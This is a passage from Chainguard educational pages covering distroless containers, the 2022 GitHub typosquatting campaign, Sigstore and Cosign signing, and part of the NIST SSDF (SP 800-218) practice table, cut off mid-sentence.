is this massive ship that has a crane on the ship itself. Sure that crane is useful for loading and unloading the packages once you get to the ports, but it’s much more efficient to leave the cranes at those ports so you can have smaller ships. A distroless analogy would be small ships here, holding exactly one container each. There’s no extra or wasted space, there’s no crane to load or unload them; you have to do that from the outside before you go on your journey. To figure out how they work, let’s again start with the traditional fat container image. These images are built up in layers. You start with a base image that contains the package manager, a shell, and other tools you might need to get your application inside. Then you add on layers, one at a time. These layers can only really add things they can add compiled executables or new packages. You can’t remove things from previous layers. --- ### WTF is a Typo Squatting Attack? URL: https://edu.chainguard.dev/software-security/videos/github-typosquatting/ Last Modified: August 1, 2022 Hi, I’m Dan Lorenc, CEO & Co-founder of Chainguard and I’ve been working in the open source software supply chain security space for a long time. Today, we’re going to recap the massive typo squatting attack that was carried out against a bunch of open source projects on GitHub on August 3, 2022. Typosquatting is a type of attack where an attacker changes the name of a real project subtly to make it look like that project but it’s not actually the same repository or package and it is really hard to detect because there are a lot of subtle ways to do it. You can change underscores to hyphens, mess around with Unicode characters, plurals, just to name a few. On August 3, a tweet went viral about over 35,000 fake repositories created cloning after real projects, things like Kubernetes, cryptography, libraries, and programming languages, all designed with very similar names. This got a little bit over sensationalized because of the scale of the attack until everyone found out what really happened. Fortunately, this was caught early, so no malicious commits are actually found in real projects. That’s where a lot of the confusion came from. Only malicious code slipped into these imposter repositories. Typically, there’s a second phase of these attacks where developers may unknowingly use the malicious fake repository’s code, thinking it was the real one, thus compromising their project. Thankfully, though, this one was caught in the middle, so nothing bad actually happened. But we don’t know how bad this one really could have been if it hadn’t been noticed and played out for longer. This attack was the largest and most advanced I’ve seen so far. The scale of over 35,000 repositories showed some clear automation. The malicious commands were slipped in and hidden inside of real ones and they were all semantically correct, too. So it’d be tough to catch, if you were just casually looking around. So what can you do to protect yourself against stuff like this? There’s a couple of different ways: As an end user, pay very close attention to your dependencies, it’s going to be hard to notice typosquatting attacks like this, but these are all very recently created repositories with very few stars and little activity as a maintainer. To prevent someone from creating an imposter repository, the only protection really available today is to sign your commits. There’s a bunch of different tooling to do this, including a new one called Gitsign, it’s part of the Sigstore project. None of these are perfect and solve it completely. But if you pay enough attention, and if enough people start signing their commits, it will be easier for us to detect these across the open source ecosystem at scale. --- ### WTF is Sigstore? URL: https://edu.chainguard.dev/software-security/videos/sigstore/ Last Modified: August 1, 2022 Let’s talk about software supply chain security. Vulnerabilities and attacks in software have been increasing in recent years, and the U.S. government recently passed a Bill in the House that would forbid the Department of Defense (DoD) from procuring any software applications that contain a single security vulnerability or CVE (short for common vulnerability or exposure). Attacks and other security issues can exist all across the software supply chain, from the dependencies or packages you leverage in your code, to the code you write, to your deployment and integration strategy, to your packaging. With so many opportunities for attack vectors and vulnerability risks, what can software developers do? Luckily there is an open source solution that can help with mitigating some of these security concerns. It’s called Sigstore, and it offers a suite of tools that provides a new standard for signing, verifying and protecting software. Sigstore handles digital signing, verification and checks for the provenance needed to make it safer to distribute and use open source software. So what does that all mean? Let’s use a in real life example: If you’re going to a concert that has an age restriction, or you want to open a new bank account, someone is going to ask you for your ID. Neither the concert venue nor the bank issued you this ID, probably a national or local governmental body did. But your ID still attests to your identity and the venue or bank will accept this ID as your identity because of the trust root that exists with this ID-issuing authority. In the case of the bank account, once you open it, your bank account number will now be part of a database or log that is connected to your identity. This is similar to how Sigstore works, bringing identity (your ID), a certificate authority (the governmental body that issued your ID), and a transparency log (bank account database) together to enable verification and trust to exist at each step of the software supply chain. We’ll break down how this happens with each part of the Sigstore project (Cosign, Rekor, Fulcio, and Gitsign) in upcoming videos so follow for more! Cosign Cosign is a tool that helps make software more secure. Part of the Sigstore project, Cosign supports container signing, verification, and storage in an OCI (open container images) registry. Cosign makes it so that code signatures can be a part of invisible infrastructure. If we think about something physical that we want to keep secure, we may think of keys and a lock. Cosign lets developers generate a key pair with a private signing key that only you have access to, and a public verification key that can be stored with the software or in a transparency log. These keys are attached to the software artifact as a signature when it is released (whether that’s as a package, binary, container, whatever). Once that software is out in the world, another developer or user can verify the claims of the signature by checking that the public key matches up with the claims. We can also think about Cosign as like a wax seal on old paper letters. When someone — say a queen or public official — wrote a letter that needed to be secured, they would close up the letter and drip wax on it, then stamp into it with their seal or emblem. This would let the person who receives the letter know that the letter is from whom it claims to be from, and also that that letter wasn’t tampered with, which the recipient would know if the wax seal was broken. Another neat thing about Sigstore is that it enables keyless signing, meaning you don’t need to generate a key pair but can use an OIDC (OpenID Connect) protocol to authenticate your identity instead. This can currently be done through Google, GitHub, or Microsoft, and it will tie your identity — based on an email address or username — to the code you are signing. We’ll go into the rest of the Sigstore suite soon — including certificates, transparency logs, and signing Git commits — so follow for more! --- ### Secure Software Development Framework (SSDF) Table, NIST SP 800-218 URL: https://edu.chainguard.dev/software-security/secure-software-development/ssdf/ Last Modified: May 10, 2023 Tags: Reference SSDF Table Practices Tasks Notional Implementation Examples References Define Security Requirements for Software Development (PO.1): Ensure that security requirements for software development are known at all times so that they can be taken into account throughout the SDLC and duplication of effort can be minimized because the requirements information can be collected once and shared. This includes requirements from internal sources (e.g., the organization’s policies, business objectives, and risk management strategy) and external sources (e.g., applicable laws and regulations). PO.1.1: Identify and document all security requirements for the organization’s software development infrastructures and processes, and maintain the requirements over time. Example 1: Define policies for securing software development infrastructures and their components, including development endpoints, throughout the SDLC and maintaining that security.Example 2: Define policies for securing software development processes throughout the SDLC and maintaining that security, including for open-source and other third-party software components utilized by software being developed.Example 3: Review and update security requirements at least annually, or sooner if there are new requirements from internal or external sources, or a major security incident targeting software development infrastructure has occurred.Example 4: Educate affected individuals on impending changes to requirements. BSAFSS: SM.3, DE.1, IA.1, IA.2BSIMM: CP1.1, CP1.3, SR1.1, SR2.2, SE1.2, SE2.6EO14028: 4e(ix)IEC62443: SM-7, SM-9NISTCSF: ID.GV-3OWASPASVS: 1.1.1OWASPMASVS: 1.10OWASPSAMM: PC1-A, PC1-B, PC2-APCISSLC: 2.1, 2.2SCFPSSD: Planning the Implementation and Deployment of Secure Development PracticesSP80053: SA-1, SA-8, SA-15, SR-3SP800160: 3.1.2, 3.2.1, 3.2.2, 3.3.1, 3.4.2, 3.4.3SP800161: SA-1, SA-8, SA-15, SR-3SP800181: T0414; K0003, K0039, K0044, K0157, K0168, K0177, K0211, K0260, K0261, K0262, K0524; S0010, S0357, S0368; A0033, A0123, A0151 PO.1.2: Identify and document all security requirements for organization-developed software to meet, and maintain the requirements over time. Example 1: Define policies that specify risk-based software architecture and design requirements, such as making code modular to facilitate code reuse and updates; isolating security components from other components during execution; avoiding undocumented commands and settings; and providing features that will aid software acquirers with the secure deployment, operation, and maintenance of the software.Example 2: Define policies that specify the security requirements for the organization’s software, and verify compliance at key points in the SDLC (e.g., classes of software flaws verified by gates, responses to vulnerabilities discovered in released software).Example 3: Analyze the risk of applicable technology stacks (e.g., languages, environments, deployment models), and recommend or require the use of stacks that will reduce risk compared to others.Example 4: Define policies that specify what needs to be archived for each software release (e.g., code, package files, third-party libraries, documentation, data inventory) and how long it needs to be retained based on the SDLC model, software end-of-life, and other factors.Example 5: Ensure that policies cover the entire software life cycle, including notifying users of the impending end of software support and the date of software end-of-life.Example 6: Review all security requirements at least annually, or sooner if there are new requirements from internal or external sources, a major vulnerability is discovered in released software, or a major security incident targeting organization-developed software has occurred.Example 7: Establish and follow processes for handling requirement exception requests, including periodic reviews of all approved exceptions. BSAFSS: SC.1-1, SC.2, PD.1-1, PD.1-2, PD.1-3, PD.2-2, SI, PA, CS, AA, LO, EEBSIMM: SM1.1, SM1.4, SM2.2, CP1.1, CP1.2, CP1.3, CP2.1, CP2.3, AM1.2, SFD1.1, SFD2.1, SFD3.2, SR1.1, SR1.3, SR2.2, SR3.3, SR3.4EO14028: 4e(ix)IEC62443: SR-3, SR-4, SR-5, SD-4ISO27034: 7.3.2MSSDL: 2, 5NISTCSF: ID.GV-3OWASPMASVS: 1.12OWASPSAMM: PC1-A, PC1-B, PC2-A, PC3-A, SR1-A, SR1-B, SR2-B, SA1-B, IR1-APCISSLC: 2.1, 2.2, 2.3, 3.3SCFPSSD: Establish Coding Standards and ConventionsSP80053: SA-8, SA-8(3), SA-15, SR-3SP800160: 3.1.2, 3.2.1, 3.3.1SP800161: SA-8, SA-15, SR-3SP800181: T0414; K0003, K0039, K0044, K0157, K0168, K0177, K0211, K0260, K0261, K0262, K0524; S0010, S0357, S0368; A0033, A0123, A0151 PO.1.3: Communicate requirements to all third parties who will provide commercial software components to the organization for reuse by the organization’s own software. [Formerly PW.3.1] Example 1: Define a core set of security requirements for software components, and include it in acquisition documents, software contracts, and other agreements with third parties.Example 2: Define security-related criteria for selecting software; the criteria can include the third party’s vulnerability disclosure program and product security incident response capabilities or the third party’s adherence to organization-defined practices.Example 3: Require third parties to attest that their software complies with the organization’s security requirements.Example 4: Require third parties to provide provenance data and integrity verification mechanisms for all components of their software.Example 5: Establish and follow processes to address risk when there are security requirements that third-party software components to be acquired do not meet; this should include periodic reviews of all approved exceptions to requirements. BSAFSS: SM.1, SM.2, SM.2-1, SM.2-4BSIMM: CP2.4, CP3.2, SR2.5, SR3.2EO14028: 4e(vi), 4e(ix)IDASOAR: 19, 21IEC62443: SM-9, SM-10MSSDL: 7NISTCSF: ID.SC-3OWASPSAMM: SR3-ASCAGILE: Tasks Requiring the Help of Security Experts 8SCFPSSD: Manage Security Risk Inherent in the Use of Third-Party ComponentsSCSIC: Vendor Sourcing Integrity ControlsSP80053: SA-4, SA-9, SA-10, SA-10(1), SA-15, SR-3, SR-4, SR-5SP800160: 3.1.1, 3.1.2SP800161: SA-4, SA-9, SA-9(1), SA-9(3), SA-10, SA-10(1), SA-15, SR-3, SR-4, SR-5SP800181: T0203, T0415; K0039; S0374; A0056, A0161 Implement Roles and Responsibilities (PO.2): Ensure that everyone inside and outside of the organization involved in the SDLC is prepared to perform their SDLC-related roles and responsibilities throughout the SDLC. PO.2.1: Create new roles and alter responsibilities for existing roles as needed to encompass all parts of the SDLC. Periodically review and maintain the defined roles and responsibilities, updating them as needed. Example 1: Define SDLC-related roles and responsibilities for all members of the software development team.Example 2: Integrate the security roles into the software development team.Example 3: Define roles and responsibilities for cybersecurity staff, security champions, project managers and leads, senior management, software developers, software testers, software assurance leads and staff, product owners, operations and platform engineers, and others involved in the SDLC.Example 4: Conduct an annual review of all roles and responsibilities.Example 5: Educate affected individuals on impending changes to roles and responsibilities, and confirm that the individuals understand the changes and agree to follow them.Example 6: Implement and use tools and processes to promote communication and engagement among individuals with SDLC-related roles and responsibilities, such as creating messaging channels for team discussions.Example 7: Designate a group of individuals or a team as the code owner for each project. BSAFSS: PD.2-1, PD.2-2BSIMM: SM1.1, SM2.3, SM2.7, CR1.7EO14028: 4e(ix)IEC62443: SM-2, SM-13NISTCSF: ID.AM-6, ID.GV-2PCISSLC: 1.2SCSIC: Vendor Software Development Integrity ControlsSP80053: SA-3SP800160: 3.2.1, 3.2.4, 3.3.1SP800161: SA-3SP800181: K0233 PO.2.2: Provide role-based training for all personnel with responsibilities that contribute to secure development. Periodically review personnel proficiency and role-based training, and update the training as needed. Example 1: Document the desired outcomes of training for each role.Example 2: Define the type of training or curriculum required to achieve the desired outcome for each role.Example 3: Create a training plan for each role.Example 4: Acquire or create training for each role; acquired training may need to be customized for the organization.Example 5: Measure outcome performance to identify areas where changes to training may be beneficial. BSAFSS: PD.2-2BSIMM: T1.1, T1.7, T1.8, T2.5, T2.8, T2.9, T3.1, T3.2, T3.4EO14028: 4e(ix)IEC62443: SM-4MSSDL: 1NISTCSF: PR.ATOWASPSAMM: EG1-A, EG2-APCISSLC: 1.3SCAGILE: Operational Security Tasks 14, 15; Tasks Requiring the Help of Security Experts 1SCFPSSD: Planning the Implementation and Deployment of Secure Development PracticesSCSIC: Vendor Software Development Integrity ControlsSP80053: SA-8SP800160: 3.2.4, 3.2.6SP800161: SA-8SP800181: OV-TEA-001, OV-TEA-002; T0030, T0073, T0320; K0204, K0208, K0220, K0226, K0243, K0245, K0252; S0100, S0101; A0004, A0057 PO.2.3: Obtain upper management or authorizing official commitment to secure development, and convey that commitment to all with development-related roles and responsibilities. Example 1: Appoint a single leader or leadership team to be responsible for the entire secure software development process, including being accountable for releasing software to production and delegating responsibilities as appropriate.Example 2: Increase authorizing officials’ awareness of the risks of developing software without integrating security throughout the development life cycle and the risk mitigation provided by secure development practices.Example 3: Assist upper management in incorporating secure development support into their communications with personnel with development-related roles and responsibilities.Example 4: Educate all personnel with development-related roles and responsibilities on upper management’s commitment to secure development and the importance of secure development to the organization. BSIMM: SM1.3, SM2.7, CP2.5EO14028: 4e(ix)NISTCSF: ID.RM-1, ID.SC-1OWASPSAMM: SM1.APCISSLC: 1.1SP800181: T0001, T0004 Implement Supporting Toolchains (PO.3): Use automation to reduce human effort and improve the accuracy, reproducibility, usability, and comprehensiveness of security practices throughout the SDLC, as well as provide a way to document and demonstrate the use of these practices. Toolchains and tools may be used at different levels of the organization, such as organization-wide or project-specific, and may address a particular part of the SDLC, like a build pipeline. PO.3.1: Specify which tools or tool types must or should be included in each toolchain to mitigate identified risks, as well as how the toolchain components are to be integrated with each other. Example 1: Define categories of toolchains, and specify the mandatory tools or tool types to be used for each category.Example 2: Identify security tools to integrate into the developer toolchain.Example 3: Define what information is to be passed between tools and what data formats are to be used.Example 4: Evaluate tools’ signing capabilities to create immutable records/logs for auditability within the toolchain.Example 5: Use automated technology for toolchain management and orchestration. BSIMM: CR1.4, ST1.4, ST2.5, SE2.7CNCFSSCP: Securing Materials—Verification; Securing Build Pipelines—Verification, Automation, Secure Authentication/Access; Securing Artefacts—Verification; Securing Deployments—VerificationEO14028: 4e(iii), 4e(ix)MSSDL: 8OWASPSAMM: IR2-B, ST2-BSCAGILE: Tasks Requiring the Help of Security Experts 9SCSIC: Vendor Software Delivery Integrity ControlsSP80053: SA-15SP800161: SA-15SP800181: K0013, K0178 PO.3.2: Follow recommended security practices to deploy, operate, and maintain tools and toolchains. Example 1: Evaluate, select, and acquire tools, and assess the security of each tool.Example 2: Integrate tools with other tools and existing software development processes and workflows.Example 3: Use code-based configuration for toolchains (e.g., pipelines-as-code, toolchains-as-code).Example 4: Implement the technologies and processes needed for reproducible builds.Example 5: Update, upgrade, or replace tools as needed to address tool vulnerabilities or add new tool capabilities.Example 6: Continuously monitor tools and tool logs for potential operational and security issues, including policy violations and anomalous behavior.Example 7: Regularly verify the integrity and check the provenance of each tool to identify potential problems.Example 8: See PW.6 regarding compiler, interpreter, and build tools.Example 9: See PO.5 regarding implementing and maintaining secure environments. BSAFSS: DE.2BSIMM: SR1.1, SR1.3, SR3.4CNCFSSCP: Securing Build Pipelines—Verification, Automation, Controlled Environments, Secure Authentication/Access; Securing Artefacts—Verification, Automation, Controlled Environments, Encryption; Securing Deployments—Verification, AutomationEO14028: 4e(i)(F), 4e(ii), 4e(iii), 4e(v), 4e(vi), 4e(ix)IEC62443: SM-7IR8397: 2.2OWASPASVS: 1.14.3, 1.14.4, 14.1, 14.2OWASPMASVS: 7.9OWASPSCVS: 3, 5SCAGILE: Tasks Requiring the Help of Security Experts 9SCFPSSD: Use Current Compiler and Toolchain Versions and Secure Compiler OptionsSCSIC: Vendor Software Delivery Integrity ControlsSP80053: SA-15SP800161: SA-15SP800181: K0013, K0178 PO.3.3: Configure tools to generate artifacts of their support of secure software development practices as defined by the organization. Example 1: Use existing tooling (e.g., workflow tracking, issue tracking, value stream mapping) to create an audit trail of the secure development-related actions that are performed for continuous improvement purposes.Example 2: Determine how often the collected information should be audited, and implement the necessary processes.Example 3: Establish and enforce security and retention policies for artifact data.Example 4: Assign responsibility for creating any needed artifacts that tools cannot generate. BSAFSS: PD.1-5BSIMM: SM1.4, SM3.4, SR1.3CNCFSSCP: Securing Build Pipelines—Verification, Automation, Controlled Environments; Securing Artefacts—VerificationEO14028: 4e(i)(F), 4e(ii), 4e(v), 4e(ix)IEC62443: SM-12, SI-2MSSDL: 8OWASPSAMM: PC3-BOWASPSCVS: 3.13, 3.14PCISSLC: 2.5SCAGILE: Tasks Requiring the Help of Security Experts 9SCSIC: Vendor Software Delivery Integrity ControlsSP80053: SA-15SP800161: SA-15SP800181: K0013; T0024 Define and Use Criteria for Software Security Checks (PO.4): Help ensure that the software resulting from the SDLC meets the organization’s expectations by defining and using criteria for checking the software’s security during development. PO.4.1: Define criteria for software security checks and track throughout the SDLC. Example 1: Ensure that the criteria adequately indicate how effectively security risk is being managed.Example 2: Define key performance indicators (KPIs), key risk indicators (KRIs), vulnerability severity scores, and other measures for software security.Example 3: Add software security criteria to existing checks (e.g., the Definition of Done in agile SDLC methodologies).Example 4: Review the artifacts generated as part of the software development workflow system to determine if they meet the criteria.Example 5: Record security check approvals, rejections, and exception requests as part of the workflow and tracking system.Example 6: Analyze collected data in the context of the security successes and failures of each development project, and use the results to improve the SDLC. BSAFSS: TV.2-1, TV.5-1BSIMM: SM1.4, SM2.1, SM2.2, SM2.6, SM3.3, CP2.2EO14028: 4e(iv), 4e(v), 4e(ix)IEC62443: SI-1, SI-2, SVV-3ISO27034: 7.3.5MSSDL: 3OWASPSAMM: PC3-A, DR3-B, IR3-B, ST3-BPCISSLC: 3.3SP80053: SA-15, SA-15(1)SP800160: 3.2.1, 3.2.5, 3.3.1SP800161: SA-15, SA-15(1)SP800181: K0153, K0165 PO.4.2: Implement processes, mechanisms, etc. to gather and safeguard the necessary information in support of the criteria. Example 1: Use the toolchain to automatically gather information that informs security decision-making.Example 2: Deploy additional tools if needed to support the generation and collection of information supporting the criteria.Example 3: Automate decision-making processes utilizing the criteria, and periodically review these processes.Example 4: Only allow authorized personnel to access the gathered information, and prevent any alteration or deletion of the information. BSAFSS: PD.1-4, PD.1-5BSIMM: SM1.4, SM2.1, SM2.2, SM3.4EO14028: 4e(iv), 4e(v), 4e(ix)IEC62443: SI-1, SVV-1, SVV-2, SVV-3, SVV-4OWASPSAMM: PC3-BPCISSLC: 2.5SCSIC: Vendor Software Delivery Integrity ControlsSP80053: SA-15, SA-15(1), SA-15(11)SP800160: 3.2.5, 3.3.7SP800161: SA-15, SA-15(1), SA-15(11)SP800181: T0349; K0153 Implement and Maintain Secure Environments for Software Development (PO.5): Ensure that all components of the environments for software development are strongly protected from internal and external threats to prevent compromises of the environments or the software being developed or maintained within them. Examples of environments for software development include development, build, test, and distribution environments. PO.5.1: Separate and protect each environment involved in software development. Example 1: Use multi-factor, risk-based authentication and conditional access for each environment.Example 2: Use network segmentation and access controls to separate the environments from each other and from production environments, and to separate components from each other within each non-production environment, in order to reduce attack surfaces and attackers’ lateral movement and privilege/access escalation.Example 3: Enforce authentication and tightly restrict connections entering and exiting each software development environment, including minimizing access to the internet to only what is necessary.Example 4: Minimize direct human access to toolchain systems, such as build services. Continuously monitor and audit all access attempts and all use of privileged access.Example 5: Minimize the use of production-environment software and services from non-production environments.Example 6: Regularly log, monitor, and audit trust relationships for authorization and access between the environments and between the components within each environment.Example 7: Continuously log and monitor operations and alerts across all components of the development environment to detect, respond, and recover from attempted and actual cyber incidents.Example 8: Configure security controls and other tools involved in separating and protecting the environments to generate artifacts for their activities.Example 9: Continuously monitor all software deployed in each environment for new vulnerabilities, and respond to vulnerabilities appropriately following a risk-based approach.Example 10: Configure and implement measures to secure the environments’ hosting infrastructures following a zero trust architecture. BSAFSS: DE.1, IA.1, IA.2CNCFSSCP: Securing Build Pipelines—Controlled EnvironmentsEO14028: 4e(i)(A), 4e(i)(B), 4e(i)(C), 4e(i)(D), 4e(i)(F), 4e(ii), 4e(iii), 4e(v), 4e(vi), 4e(ix)IEC62443: SM-7NISTCSF: PR.AC-5, PR.DS-7SCAGILE: Tasks Requiring the Help of Security Experts 11SCSIC: Vendor Software Delivery Integrity ControlsSP80053: SA-3(1), SA-8, SA-15SP800161: SA-3, SA-8, SA-15SP800181: OM-NET-001, SP-SYS-001; T0019, T0023, T0144, T0160, T0262, T0438, T0484, T0485, T0553; K0001, K0005, K0007, K0033, K0049, K0056, K0061, K0071, K0104, K0112, K0179, K0326, K0487; S0007, S0084, S0121; A0048 PO.5.2: Secure and harden development endpoints (i.e., endpoints for software designers, developers, testers, builders, etc.) to perform development-related tasks using a risk-based approach. Example 1: Configure each development endpoint based on approved hardening guides, checklists, etc.; for example, enable FIPS-compliant encryption of all sensitive data at rest and in transit.Example 2: Configure each development endpoint and the development resources to provide the least functionality needed by users and services and to enforce the principle of least privilege.Example 3: Continuously monitor the security posture of all development endpoints, including monitoring and auditing all use of privileged access.Example 4: Configure security controls and other tools involved in securing and hardening development endpoints to generate artifacts for their activities.Example 5: Require multi-factor authentication for all access to development endpoints and development resources.Example 6: Provide dedicated development endpoints on non-production networks for performing all development-related tasks. Provide separate endpoints on production networks for all other tasks.Example 7: Configure each development endpoint following a zero trust architecture. BSAFSS: DE.1-1, IA.1, IA.2EO14028: 4e(i)(C), 4e(i)(E), 4e(i)(F), 4e(ii), 4e(iii), 4e(v), 4e(vi), 4e(ix)IEC62443: SM-7NISTCSF: PR.AC-4, PR.AC-7, PR.IP-1, PR.IP-3, PR.IP-12, PR.PT-1, PR.PT-3, DE.CMSCAGILE: Tasks Requiring the Help of Security Experts 11SCSIC: Vendor Software Delivery Integrity ControlsSP80053: SA-15SP800161: SA-15SP800181: OM-ADM-001, SP-SYS-001; T0484, T0485, T0489, T0553; K0005, K0007, K0077, K0088, K0130, K0167, K0205, K0275; S0076, S0097, S0121, S0158; A0155 Protect All Forms of Code from Unauthorized Access and Tampering (PS.1): Help prevent unauthorized changes to code, both inadvertent and intentional, which could circumvent or negate the intended security characteristics of the software. For code that is not intended to be publicly accessible, this helps prevent theft of the software and may make it more difficult or time-consuming for attackers to find vulnerabilities in the software. PS.1.1: Store all forms of code – including source code, executable code, and configuration-as-code – based on the principle of least privilege so that only authorized personnel, tools, services, etc. have access. Example 1: Store all source code and configuration-as-code in a code repository, and restrict access to it based on the nature of the code. For example, open-source code intended for public access may need its integrity and availability protected; other code may also need its confidentiality protected.Example 2: Use version control features of the repository to track all changes made to the code with accountability to the individual account.Example 3: Use commit signing for code repositories.Example 4: Have the code owner review and approve all changes made to the code by others.Example 5: Use code signing to help protect the integrity of executables.Example 6: Use cryptography (e.g., cryptographic hashes) to help protect file integrity. BSAFSS: IA.1, IA.2, SM.4-1, DE.1-2BSIMM: SE2.4CNCFSSCP: Securing the Source Code—Verification, Automation, Controlled Environments, Secure Authentication; Securing Materials—AutomationEO14028: 4e(iii), 4e(iv), 4e(ix)IDASOAR: Fact Sheet 25IEC62443: SM-6, SM-7, SM-8NISTCSF: PR.AC-4, PR.DS-6, PR.IP-3OWASPASVS: 1.10, 10.3.2OWASPMASVS: 7.1OWASPSAMM: OE3-BPCISSLC: 5.1, 6.1SCSIC: Vendor Software Delivery Integrity Controls, Vendor Software Development Integrity ControlsSP80053: SA-10SP800161: SA-8, SA-10 Provide a Mechanism for Verifying Software Release Integrity (PS.2): Help software acquirers ensure that the software they acquire is legitimate and has not been tampered with. PS.2.1: Make software integrity verification information available to software acquirers. Example 1: Post cryptographic hashes for release files on a well-secured website.Example 2: Use an established certificate authority for code signing so that consumers’ operating systems or other tools and services can confirm the validity of signatures before use.Example 3: Periodically review the code signing processes, including certificate renewal, rotation, revocation, and protection. BSAFSS: SM.4, SM.5, SM.6BSIMM: SE2.4CNCFSSCP: Securing Deployments—VerificationEO14028: 4e(iii), 4e(ix), 4e(x)IEC62443: SM-6, SM-8, SUM-4NISTCSF: PR.DS-6NISTLABEL: 2.2.2.4OWASPSAMM: OE3-BOWASPSCVS: 4PCISSLC: 6.1, 6.2SCSIC: Vendor Software Delivery Integrity ControlsSP80053: SA-8SP800161: SA-8SP800181: K0178 Archive and Protect Each Software Release (PS.3): Preserve software releases in order to help identify, analyze, and eliminate vulnerabilities discovered in the software after release. PS.3.1: Securely archive the necessary files and supporting data (e.g., integrity verification information, provenance data) to be retained for each software release. Example 1: Store the release files, associated images, etc. in repositories following the organization’s established policy. Allow read-only access to them by necessary personnel and no access by anyone else.Example 2: Store and protect release integrity verification information and provenance data, such as by keeping it in a separate location from the release files or by signing the data. BSAFSS: PD.1-5, DE.1-2, IA.2CNCFSSCP: Securing Artefacts—Automation, Controlled Environments, Encryption; Securing Deployments—VerificationEO14028: 4e(iii), 4e(vi), 4e(ix), 4e(x)IDASOAR: 25IEC62443: SM-6, SM-7NISTCSF: PR.IP-4OWASPSCVS: 1, 3.18, 3.19, 6.3PCISSLC: 5.2, 6.1, 6.2SCSIC: Vendor Software Delivery Integrity ControlsSP80053: SA-10, SA-15, SA-15(11), SR-4SP800161: SA-8, SA-10, SA-15(11), SR-4 PS.3.2: Collect, safeguard, maintain, and share provenance data for all components of each software release (e.g., in a software bill of materials [SBOM]). Example 1: Make the provenance data available to software acquirers in accordance with the organization’s policies, preferably using standards-based formats.Example 2: Make the provenance data available to the organization’s operations and response teams to aid them in mitigating software vulnerabilities.Example 3: Protect the integrity of provenance data, and provide a way for recipients to verify provenance data integrity.Example 4: Update the provenance data every time any of the software’s components are updated. BSAFSS: SM.2BSIMM: SE3.6CNCFSSCP: Securing Materials—Verification, AutomationEO14028: 4e(vi), 4e(vii), 4e(ix), 4e(x)NTIASBOM: AllOWASPSCVS: 1.4, 2SCSIC: Vendor Software Delivery Integrity ControlsSCTPC: MAINTAIN3SP80053: SA-8, SR-3, SR-4SP800161: SA-8, SR-3, SR-4 Design Software to Meet Security Requirements and Mitigate Security Risks (PW.1): Identify and evaluate the security requirements for the software; determine what security risks the software is likely to face during operation and how the software’s design and architecture should mitigate those risks; and justify any cases where risk-based analysis indicates that security requirements should be relaxed or waived. Addressing security requirements and risks during software design (secure by design) is key for improving software security and also helps improve development efficiency. PW.1.1: Use forms of risk modeling – such as threat modeling, attack modeling, or attack surface mapping – to help assess the security risk for the software. Example 1: Train the development team (security champions, in particular) or collaborate with a risk modeling expert to create models and analyze how to use a risk-based approach to communicate the risks and determine how to address them, including implementing mitigations.Example 2: Perform more rigorous assessments for high-risk areas, such as protecting sensitive data and safeguarding identification, authentication, and access control, including credential management.Example 3: Review vulnerability reports and statistics for previous software to inform the security risk assessment.Example 4: Use data classification methods to identify and characterize each type of data that the software will interact with. BSAFSS: SC.1BSIMM: AM1.2, AM1.3, AM1.5, AM2.1, AM2.2, AM2.5, AM2.6, AM2.7, SFD2.2, AA1.1, AA1.2, AA1.3, AA2.1EO14028: 4e(ix)IDASOAR: 1IEC62443: SM-4, SR-1, SR-2, SD-1IR8397: 2.1ISO27034: 7.3.3MSSDL: 4NISTCSF: ID.RAOWASPASVS: 1.1.2, 1.2, 1.4, 1.6, 1.8, 1.9, 1.11, 2, 3, 4, 6, 8, 9, 11, 12, 13OWASPMASVS: 1.6, 1.8, 2, 3, 4, 5, 6OWASPSAMM: TA1-A, TA1-B, TA3-B, DR1-APCISSLC: 3.2, 3.3SCAGILE: Tasks Requiring the Help of Security Experts 3SCFPSSD: Threat ModelingSCTTM: Entire guideSP80053: SA-8, SA-11(2), SA-11(6), SA-15(5)SP800160: 3.3.4, 3.4.5SP800161: SA-8, SA-11(2), SA-11(6), SA-15(5)SP800181: T0038, T0062; K0005, K0009, K0038, K0039, K0070, K0080, K0119, K0147, K0149, K0151, K0152, K0160, K0161, K0162, K0165, K0297, K0310, K0344, K0362, K0487, K0624; S0006, S0009, S0022, S0078, S0171, S0229, S0248; A0092, A0093, A0107 PW.1.2: Track and maintain the software’s security requirements, risks, and design decisions. Example 1: Record the response to each risk, including how mitigations are to be achieved and what the rationales are for any approved exceptions to the security requirements. Add any mitigations to the software’s security requirements.Example 2: Maintain records of design decisions, risk responses, and approved exceptions that can be used for auditing and maintenance purposes throughout the rest of the software life cycle.Example 3: Periodically re-evaluate all approved exceptions to the security requirements, and implement changes as needed. BSAFSS: SC.1-1, PD.1-1BSIMM: SFD3.1, SFD3.3, AA2.2, AA3.2EO14028: 4e(v), 4e(ix)IEC62443: SD-1ISO27034: 7.3.3MSSDL: 4NISTLABEL: 2.2.2.2OWASPASVS: 1.1.3, 1.1.4OWASPMASVS: 1.3, 1.6OWASPSAMM: DR1-BPCISSLC: 3.2, 3.3SP80053: SA-8, SA-10, SA-17SP800161: SA-8, SA-17SP800181: T0256; K0005, K0038, K0039, K0147, K0149, K0160, K0161, K0162, K0165, K0344, K0362, K0487; S0006, S0009, S0078, S0171, S0229, S0248; A0092, A0107 PW.1.3: Where appropriate, build in support for using standardized security features and services (e.g., enabling software to integrate with existing log management, identity management, access control, and vulnerability management systems) instead of creating proprietary implementations of security features and services. [Formerly PW.4.3] Example 1: Maintain one or more software repositories of modules for supporting standardized security features and services.Example 2: Determine secure configurations for modules for supporting standardized security features and services, and make these configurations available (e.g., as configuration-as-code) so developers can readily use them.Example 3: Define criteria for which security features and services must be supported by software to be developed. BSAFSS: SI.2-1, SI.2-2, LO.1BSIMM: SFD1.1, SFD2.1, SFD3.2, SR1.1, SR3.4EO14028: 4e(ix)IEC62443: SD-1, SD-4MSSDL: 5OWASPASVS: 1.1.6OWASPSAMM: SA2-ASCFPSSD: Standardize Identity and Access Management; Establish Log Requirements and Audit Practices Review the Software Design to Verify Compliance with Security Requirements and Risk Information (PW.2): Help ensure that the software will meet the security requirements and satisfactorily address the identified risk information. PW.2.1: Have 1) a qualified person (or people) who were not involved with the design and/or 2) automated processes instantiated in the toolchain review the software design to confirm and enforce that it meets all of the security requirements and satisfactorily addresses the identified risk information. Example 1: Review the software design to confirm that it addresses applicable security requirements.Example 2: Review the risk models created during software design to determine if they appear to adequately identify the risks.Example 3: Review the software design to confirm that it satisfactorily addresses the risks identified by the risk models.Example 4: Have the software’s designer correct failures to meet the requirements.Example 5: Change the design and/or the risk response strategy if the security requirements cannot be met.Example 6: Record the findings of design reviews to serve as artifacts (e.g., in the software specification, in the issue 